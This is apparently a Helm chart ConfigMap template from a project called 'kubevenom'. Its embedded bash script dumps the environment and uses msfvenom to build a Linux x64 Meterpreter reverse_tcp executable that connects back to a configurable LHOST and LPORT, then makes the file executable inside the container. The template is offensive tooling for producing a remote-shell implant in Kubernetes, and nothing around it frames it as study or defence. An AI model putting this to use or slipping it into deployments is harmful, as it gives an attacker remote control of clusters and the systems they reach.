apiVersion: v1
kind: ConfigMap
metadata:
  name: {{ include "kubevenom.fullname" . }}
  labels:
    {{- include "kubevenom.labels" . | nindent 4 }}
data:
  kubevenom.sh: |-
    #!/bin/bash -x

    env
    pwd
    ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > /kubevenom/kubevenom
    chmod +x /kubevenom/kubevenom
    ls -la /kubevenom/kubevenom
